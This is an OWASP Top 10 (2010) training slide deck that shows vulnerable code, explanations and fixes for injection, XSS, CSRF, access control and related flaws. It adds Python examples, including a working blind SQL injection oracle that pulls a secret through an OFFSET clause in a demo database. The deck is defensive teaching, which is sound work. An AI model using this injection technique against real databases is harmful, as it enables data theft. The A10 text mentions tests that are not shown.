OWASP Top 10
Bill Riggins III
OWASP Orlando Co-Chapter Lead
Top 10 for 2010
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards
A1: Injection
A1: Injection
Spot the Bug
<?php
$offset = $_GET['offset'];
$query = "SELECT id, name FROM products
ORDER BY name LIMIT 20 OFFSET $offset;";
$result = pg_query($conn, $query);
?>
A1: Injection
Spot the Bug Solution
<?php
$offset = $_GET['offset'];
// bug: $offset comes straight from the request and is interpolated into the SQL text,
// so whatever the client sends after OFFSET is parsed and executed by PostgreSQL
$query = "SELECT id, name FROM products
ORDER BY name LIMIT 20 OFFSET $offset;";
$result = pg_query($conn, $query);
?>
A1: Injection
Spot the Bug Mitigation
<?php
$offset = $_GET['offset'];
// single quotes: $1 is a PostgreSQL placeholder, not a PHP variable
$query = 'SELECT id, name FROM products
ORDER BY name LIMIT 20 OFFSET $1;';
// the value travels to the server separately from the SQL text, so it can never be parsed as SQL;
// rejecting anything that is not a non-negative integer first (e.g. with ctype_digit()) is still good practice
$result = pg_query_params($conn, $query, array($offset));
?>
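The same OFFSET injection carried through to a working attack, as an added example that is not part of the slides: the vulnerable query and the parameterised fix are reproduced in Python against an in-memory SQLite database (so it runs offline), and a boolean-based blind oracle reads a secret through the OFFSET clause using nothing but the row count. The tables, the secret value and the payload are constructed for this demonstration.

```python
# Added example, not code from the slides: the OFFSET injection from the A1 slide,
# reproduced against an in-memory SQLite database so it runs offline. The tables,
# the secret value and the payload are constructed for this demonstration.
import sqlite3
import string

SECRET = "S3cr3t"  # constructed secret that the blind injection will recover


def make_db():
    """Build the products table from the slide plus a users table holding a secret."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT);
        """
    )
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))
    conn.executemany(
        "INSERT INTO products (name) VALUES (?)",
        [(f"product{i:02d}",) for i in range(50)],
    )
    return conn


def vulnerable_page(conn, offset):
    """Same shape as the slide: request input interpolated into the SQL text."""
    query = f"SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET {offset}"
    return conn.execute(query).fetchall()


def safe_page(conn, offset):
    """Same shape as the mitigation slide: validate the type, then bind it as a
    parameter so the database never parses it as SQL."""
    offset = int(offset)  # ValueError on anything that is not an integer
    if offset < 0:
        raise ValueError("offset must be non-negative")
    query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET ?"
    return conn.execute(query, (offset,)).fetchall()


def blind_extract(conn, length=len(SECRET)):
    """Read users.secret through vulnerable_page() used as a boolean oracle.

    OFFSET accepts any scalar expression, so a subquery chooses between offset 0
    (a true guess: the first 20 products come back) and offset 100 (a false
    guess: past the end of the table, nothing comes back). No error message and
    no UNION are needed; the row count alone leaks one character per loop.
    """
    found = ""
    for pos in range(1, length + 1):
        for ch in string.ascii_letters + string.digits:
            payload = (
                f"(SELECT CASE WHEN substr(secret, {pos}, 1) = '{ch}' "
                f"THEN 0 ELSE 100 END FROM users WHERE id = 1)"
            )
            if vulnerable_page(conn, payload):
                found += ch
                break
        else:
            break  # character outside the alphabet; stop rather than guess
    return found
```

Run `blind_extract(make_db())` to watch the secret come back one character at a time; feed the same payload to `safe_page()` and it is refused before any SQL runs. The point the slide cannot show on its own is that an injection point in a numeric clause with no output and no error messages is still fully exploitable.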
A2: Cross-Site Scripting (XSS)
A2: Cross-Site Scripting (XSS)
Spot the Bug
<!doctype html><html lang="en">
<head><title>XSS test</title></head>
<body>
<form>
<input type="text" name="xss">
<input type="submit">
</form>
<p>Result: ${param.xss}</p>
</body></html>
A2: Cross-Site Scripting (XSS)
Spot the Bug Solution
<!doctype html><html lang="en">
<head><title>XSS test</title></head>
<body>
<form>
<input type="text" name="xss">
<input type="submit">
</form>
<%-- bug: ${param.xss} writes the request parameter into the page as raw HTML, so a value such as <script>...</script> runs in the visitor's browser --%>
<p>Result: ${param.xss}</p>
</body></html>
A2: Cross-Site Scripting (XSS)
Spot the Bug Mitigation
<%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions" %>
<!doctype html><html lang="en">
<head><title>XSS test</title></head>
<body>
<form>
<input type="text" name="xss">
<input type="submit">
</form>
<%-- fn:escapeXml encodes <, >, &, ' and ", which is the right encoding for HTML body and quoted-attribute contexts; a value placed inside a script block or a URL needs a different encoder --%>
<p>Result: ${fn:escapeXml(param.xss)}</p>
</body></html>
A3: Broken Auth & Session Mgmt.
A3: Broken Auth & Session Mgmt.
Spot the Bug
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png,
image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789
A3: Broken Auth & Session Mgmt.
Spot the Bug Solution
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png,
image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789
Bug: the session identifier is a short, sequential number rather than a random token, so an attacker can guess a valid one, and it travels over plain HTTP where it can be read off the wire.
A3: Broken Auth & Session Mgmt.
Spot the Bug Mitigation
• Use HTTPS for authorization checks
• Use the HttpOnly and Secure cookie flags
• Keep the session cookie out of the URL
• Rotate session IDs after successful login
• Etc, see OWASP documentation.
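The bullets above as a small server-side session store, added here as an example that is not part of the slides: a random 256-bit identifier instead of a counter, rotation of the identifier on login, and a Set-Cookie header carrying the flags. The cookie name PHPSESSID is kept from the slide; the SameSite attribute is a later browser feature the 2010 deck does not mention and is included only as defence in depth.

```python
# Added example, not code from the slides: a minimal server-side session store that
# applies the A3 mitigation bullets (random identifier, rotation on login, cookie
# flags). PHPSESSID is kept from the slide; SameSite is a newer browser attribute
# the 2010 deck does not mention and is included as defence in depth.
import secrets

ID_BYTES = 32  # 256 bits from the OS CSPRNG; the slide's 123456789 is neither random nor long


class SessionStore:
    def __init__(self):
        self._sessions = {}

    def new(self):
        """Create an anonymous session under a fresh, unguessable identifier."""
        sid = secrets.token_urlsafe(ID_BYTES)
        self._sessions[sid] = {"user": None}
        return sid

    def get(self, sid):
        return self._sessions.get(sid)

    def login(self, sid, user):
        """Authenticate the session and rotate its identifier: an id that was fixed
        or observed before login no longer maps to anything afterwards."""
        data = self._sessions.pop(sid, None)
        if data is None:
            data = {"user": None}
        data["user"] = user
        new_sid = secrets.token_urlsafe(ID_BYTES)
        self._sessions[new_sid] = data
        return new_sid

    def logout(self, sid):
        self._sessions.pop(sid, None)


def set_cookie_header(sid):
    """Set-Cookie header for the session id: HttpOnly keeps it away from script,
    Secure keeps it off plaintext HTTP, and it is never placed in a URL."""
    return f"Set-Cookie: PHPSESSID={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"


def looks_predictable(sid):
    """Rough check in the spirit of the slide's bug: a purely numeric or short id
    is a sign the generator is a counter or a timestamp, not a CSPRNG."""
    return sid.isdigit() or len(sid) < 16
```

The rotation in `login()` is what defeats session fixation: an identifier an attacker planted or sniffed before authentication is discarded at the moment the session gains value.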
A4: Insecure Direct Object References
A4: Insecure Direct Object References
Spot the Bug
String query = "SELECT * FROM accts WHERE account = ?";
PreparedStatement pstmt = connection.prepareStatement(query, ...);
pstmt.setString(1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery();
A4: Insecure Direct Object References
Spot the Bug Solution
String query = "SELECT * FROM accts WHERE account = ?";
PreparedStatement pstmt = connection.prepareStatement(query, ...);
// bug: the query is parameterised, so it is not injectable, but the account number comes
// straight from the request and nothing ties it to the logged-in user: change acct and read anyone's account
pstmt.setString(1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery();
A4: Insecure Direct Object References
Spot the Bug Mitigation
String query = "SELECT * FROM accts WHERE account = ? and acctOwner = ?";
PreparedStatement pstmt = connection.prepareStatement(query, ...);
// the account comes from the user's own session-side list (an indirect reference)
// and the ownership check is part of the query itself
pstmt.setString(1, myUser.accts[0]);
pstmt.setString(2, myUser.id);
ResultSet results = pstmt.executeQuery();
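The two Java snippets above carried through in Python against an in-memory SQLite table, as an added example that is not part of the slides: the direct lookup lets one user read another's account, while the fixed version resolves an index into the session's own account list and still scopes the query to the owner. Account numbers, owners and balances are constructed for the demo.

```python
# Added example, not code from the slides: the A4 account lookup reproduced in Python
# against an in-memory SQLite table, with the direct lookup beside the fixed version
# that resolves an indirect reference from the user's session and scopes the query to
# the owner. Account numbers, owners and balances are constructed for this demo.
import sqlite3
from dataclasses import dataclass


@dataclass
class User:
    id: str
    accts: list  # the accounts this session may see, loaded at login (the slide's myUser.accts)


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE accts (account TEXT PRIMARY KEY, acctOwner TEXT, balance INTEGER);
        INSERT INTO accts VALUES ('A-1001', 'alice', 5000);
        INSERT INTO accts VALUES ('A-1002', 'bob', 120);
        """
    )
    return conn


def account_vulnerable(conn, acct_param):
    """Parameterised, so no SQL injection, but the only key is a client-supplied
    account number: anyone logged in can read anyone's account."""
    return conn.execute(
        "SELECT account, acctOwner, balance FROM accts WHERE account = ?",
        (acct_param,),
    ).fetchone()


def account_fixed(conn, user, index_param):
    """The client sends an index into the user's own account list (the slide's
    myUser.accts[0]); the query is still restricted to acctOwner = user.id so a
    stale or tampered list cannot widen access."""
    try:
        idx = int(index_param)
        if idx < 0:
            raise ValueError("negative index")
        account = user.accts[idx]
    except (ValueError, IndexError):
        raise PermissionError("no such account for this user")
    row = conn.execute(
        "SELECT account, acctOwner, balance FROM accts "
        "WHERE account = ? AND acctOwner = ?",
        (account, user.id),
    ).fetchone()
    if row is None:
        raise PermissionError("account is not owned by this user")
    return row
```

Note that the ownership clause in the SQL is not redundant with the indirect reference: if the session's account list is ever built from stale or attacker-influenced data, the database still refuses rows the user does not own.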
A5: Cross-Site Request Forgery (CSRF)
A5: Cross-Site Request Forgery
Spot the Bug
<cfif IsUserLoggedIn()>
<cfset user = GetAuthUser()>
<cfset pageid = url.pageid>
<cfquery name="myquery" datasource="myds">
UPDATE member_likes set like = 1 where
pageid = <cfqueryparam cfsqltype="cf_sql_varchar" maxlength="250" value="#pageid#" />
</cfquery></cfif>
<a href="likeme.cfm?pageid=112">Like Me</a>
A5: Cross-Site Request Forgery
Spot the Bug Solution
<!--- bug: a plain GET authenticated only by the session cookie changes state, so any page the
victim visits while logged in can trigger it, e.g. with <img src="likeme.cfm?pageid=..."> --->
<cfif IsUserLoggedIn()>
<cfset user = GetAuthUser()>
<cfset pageid = url.pageid>
<cfquery name="myquery" datasource="myds">
UPDATE member_likes set like = 1 where
pageid = <cfqueryparam cfsqltype="cf_sql_varchar" maxlength="250" value="#pageid#" />
</cfquery></cfif>
<a href="likeme.cfm?pageid=112">Like Me</a>
A5: Cross-Site Request Forgery
Spot the Bug Mitigation
<!--- the action is now a POST that must carry a token tied to this session; a cross-site page
cannot read the token, so it cannot forge the request --->
<cfif IsUserLoggedIn() and isDefined("form.csrfToken") and CSRFVerifyToken(form.csrfToken)>
<cfset user = GetAuthUser()>
<cfset pageid = form.pageid>
<cfquery name="myquery" datasource="myds">
UPDATE member_likes set like = 1 where
pageid = <cfqueryparam cfsqltype="cf_sql_varchar" maxlength="250" value="#pageid#" />
</cfquery></cfif>
<cfset csrfToken = CSRFGenerateToken() />
<cfform method="post" action="likeme.cfm">
<cfinput name="csrfToken" type="hidden" value="#csrfToken#" />
<cfinput name="pageid" type="hidden" value="31337" />
<cfinput name="Submit" type="submit" value="Like Me" />
</cfform>
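The synchronizer-token pattern that CSRFGenerateToken/CSRFVerifyToken implement, written out in Python as an added example that is not part of the slides, so that the three rejected cases (a GET link, a POST with no token, a POST with the wrong token) and the accepted one can be exercised. Request and session objects are plain dicts constructed for the demo, and the handler returns an HTTP status code.

```python
# Added example, not code from the slides: the A5 "like" endpoint as a small Python
# handler using the synchronizer-token pattern that CSRFGenerateToken/CSRFVerifyToken
# implement in ColdFusion. Request and session objects are plain dicts constructed
# for the demo; the HTTP status code is the handler's return value.
import hmac
import secrets


def issue_token(session):
    """Generate a per-session token and remember it server-side; the page embeds it
    in a hidden form field. A page on another origin cannot read it."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def verify_token(session, submitted):
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)  # constant-time comparison


def like_page(session, request, likes):
    """State-changing action. A GET (the slide's <a href=...> link, or an <img>
    tag on an attacker's page) is refused outright; a POST must carry the token
    that only a page served to this session could contain."""
    if request["method"] != "POST":
        return 405
    if not session.get("user"):
        return 401
    if not verify_token(session, request["form"].get("csrfToken")):
        return 403
    likes.add((session["user"], request["form"]["pageid"]))
    return 200
```

Refusing GET for state changes is not a CSRF defence by itself (a cross-site form can POST just as easily); the token is what does the work, and the constant-time comparison keeps the check from leaking the token byte by byte.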
A6: Security Misconfiguration
A6: Security Misconfiguration
Spot the Bug
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users>
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
</tomcat-users>
A6: Security Misconfiguration
Spot the Bug Solution
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users>
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<!-- bug: the well-known default tomcat/tomcat credentials are left in place, and they carry both manager roles, which allow deploying arbitrary web applications -->
<user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
</tomcat-users>
A6: Security Misconfiguration
Spot the Bug Mitigation
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users>
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<!-- myusername/mypassword are placeholders: use a unique account name and a strong password, and do not deploy the manager application at all on servers that do not need it -->
<user username="myusername" password="mypassword" roles="manager-gui,manager-script"/>
</tomcat-users>
Also, see: https://www.owasp.org/index.php/Securing_tomcat
A7: Insecure Cryptographic Storage
A7: Insecure Cryptographic Storage
Spot the Bug
<?php
$encryptedPassword = sha1(strtolower('username') . 'password');
?>
A7: Insecure Cryptographic Storage
Spot the Bug Solution
<?php
// bug: a single fast, unsalted SHA-1 (nothing is encrypted, despite the variable name);
// the lower-cased username is predictable, so it adds no secrecy, the same credentials
// always give the same digest, and SHA-1 is cheap enough to brute-force offline at scale
$encryptedPassword = sha1(strtolower('username') . 'password');
?>
A7: Insecure Cryptographic Storage
Spot the Bug Mitigation
I may be shamed for this, but the answer is
(almost) always...
bcrypt.
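The slide's scheme beside a slow, salted password hash, as an added example that is not part of the slides. The deck's answer is bcrypt; bcrypt is a third-party package in Python, so this block uses hashlib.scrypt from the standard library as a stand-in with the same properties that matter here (a random per-user salt, a deliberately expensive function, and the parameters stored with the digest so they can be raised later). The passwords are constructed inputs.

```python
# Added example, not code from the slides: the A7 hash beside a slow, salted
# password hash. The deck's answer is bcrypt; it is a third-party package in
# Python, so this block uses hashlib.scrypt from the standard library as a
# stand-in with the same properties (per-user random salt, deliberately
# expensive, parameters stored with the hash). Passwords are constructed inputs.
import hashlib
import hmac
import os

N, R, P, DKLEN = 2 ** 14, 8, 1, 32  # about 16 MiB of memory per hash at these settings


def slide_hash(username, password):
    """The slide's scheme: one fast SHA-1 over a predictable prefix and the password.
    The same credentials always give the same digest, and SHA-1 runs at billions
    of guesses per second on a GPU."""
    return hashlib.sha1((username.lower() + password).encode()).hexdigest()


def hash_password(password):
    """Fresh random salt per call, so two users with the same password (or the
    same user twice) never share a digest."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=N, r=R, p=P, dklen=DKLEN)
    return f"scrypt${N}${R}${P}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the parameters and salt stored alongside the digest, and
    compare in constant time."""
    algo, n, r, p, salt_hex, digest_hex = stored.split("$")
    if algo != "scrypt":
        raise ValueError("unsupported hash format")
    expected = bytes.fromhex(digest_hex)
    digest = hashlib.scrypt(
        password.encode(), salt=bytes.fromhex(salt_hex),
        n=int(n), r=int(r), p=int(p), dklen=len(expected),
    )
    return hmac.compare_digest(digest, expected)
```

Storing the cost parameters in the string is what lets you raise N on the next login without a migration, which is the same reason bcrypt embeds its work factor in the `$2b$12$...` prefix.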
A8: Failure to Restrict URL Access
A8: Failure to Restrict URL Access
Spot the Bug
<location path="Admin">
<system.web>
<authorization>
<allow users="*" />
</authorization>
</system.web>
</location>
A8: Failure to Restrict URL Access
Spot the Bug Solution
<location path="Admin">
<system.web>
<authorization>
<!-- bug: "*" matches every user, anonymous included, so /Admin is open to anyone who knows the URL -->
<allow users="*" />
</authorization>
</system.web>
</location>
A8: Failure to Restrict URL Access
Spot the Bug Mitigation
<location path="Admin">
<system.web>
<authorization>
<!-- rules are evaluated top to bottom and the first match wins, so the deny must come after the allow -->
<allow users="briggins" />
<deny users="*" />
</authorization>
</system.web>
</location>
A9: Insufficient Transport Layer Protection
A9: Insufficient Transport Protection
Spot the Bug
A9: Insufficient Transport Protection
Spot the Bug Solution
A9: Insufficient Transport Protection
Spot the Bug Mitigation
<!-- inside the <security-constraint> for the protected URLs in web.xml -->
<user-data-constraint>
<transport-guarantee>CONFIDENTIAL</transport-guarantee>
</user-data-constraint>
Also, see: https://www.owasp.org/index.php/Securing_tomcat#Securing_Manager_WebApp
A10: Unvalidated Redirects and Forwards
A10: Unvalidated Redirects, Forwards
Spot the Bug
public class RedirectServlet extends HttpServlet {
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String query = request.getQueryString();
        if (query.contains("url")) {
            String url = request.getParameter("url");
            response.sendRedirect(url);
        }
    }
}
A10: Unvalidated Redirects, Forwards
Spot the Bug Solution
public class RedirectServlet extends HttpServlet {
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String query = request.getQueryString();
        if (query.contains("url")) {
            // bug: the url parameter is passed to the browser unchecked, so a link on this
            // trusted domain can carry a victim to any external site the attacker chooses
            String url = request.getParameter("url");
            response.sendRedirect(url);
        }
    }
}
A10: Unvalidated Redirects, Forwards
Spot the Bug Mitigation
public class RedirectServlet extends HttpServlet {
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String query = request.getQueryString();
        if (query.contains("goThere")) {
            // only a fixed, trusted destination is ever sent; nothing from the request reaches sendRedirect
            response.sendRedirect("http://mysite.com");
        }
    }
}
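The mitigation slide hard-codes one destination. When the application really does need a variable target, the check below is the general form, added here as an example that is not part of the slides: it accepts only site-local paths or absolute http(s) URLs whose host is on an allow-list, and it handles the bypasses that a naive "starts with /" or "contains my domain" test misses. The allow-listed host names and the sample targets are constructed for the demo.

```python
# Added example, not code from the slides: a redirect-target check that goes beyond
# the mitigation slide's fixed destination. It allows only site-local paths or
# absolute http(s) URLs whose host is on an allow-list, and it rejects the usual
# bypasses. Host names and sample targets are constructed for the demo.
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"mysite.com", "www.mysite.com"}  # assumed allow-list for this demo


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    if not target:
        return False
    # Browsers treat a backslash as a slash in http(s) URLs, so normalise first
    # or "/\evil.com" slips past a check that only looks for "//".
    t = target.strip().replace("\\", "/")
    parts = urlsplit(t)
    if parts.scheme:
        # Absolute URL: only http(s), and only to a host we own. urlsplit().hostname
        # drops userinfo and port, so "http://mysite.com@evil.com" yields "evil.com",
        # and "https:evil.com" (no slashes) yields no host at all and is refused.
        return parts.scheme in ("http", "https") and parts.hostname in allowed_hosts
    if t.startswith("//"):
        return False  # protocol-relative URL: the browser fills in the scheme
    return t.startswith("/")  # a path on this site


def redirect_or_default(target, default="/"):
    """What the servlet should do: send the user to the validated target, else home."""
    return target if is_safe_redirect(target) else default
```

An allow-list of hosts is the right shape here; substring or prefix checks on the domain fail against `mysite.com.evil.com`, userinfo tricks and protocol-relative URLs, all of which the tests below exercise.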
What about _____?
This isn't just about JSP and PHP, or custom code:
• http://www.didrailshaveamajorsecurityflawtoday.com/
• http://osvdb.org/search?search%5Bvuln_title%5D=csrf&search%5Btext_type%5D=alltext
• http://osvdb.org/search?search%5Bvuln_title%5D=xss&search%5Btext_type%5D=alltext
• http://osvdb.org/search?search%5Bvuln_title%5D=django&search%5Btext_type%5D=alltext
• http://osvdb.org/search?search%5Bvuln_title%5D=wordpress&search%5Btext_type%5D=alltext
• http://osvdb.org/search?search%5Bvuln_title%5D=drupal&search%5Btext_type%5D=alltext
Resources
• http://php.net/manual/en/security.database.sql-injection.php
• http://stackoverflow.com/questions/2905886/what-makes-an-input-vulnerable-to-xss
• http://www.exploit-db.com/papers/15990/
• https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References
• http://blogs.coldfusion.com/post.cfm/protecting-web-applications-from-csrf-attacks-with-coldfusion-10
• http://www.troyhunt.com/2011/08/owasp-top-10-for-net-developers-part-8.html
• http://cwe.mitre.org/data/definitions/601.html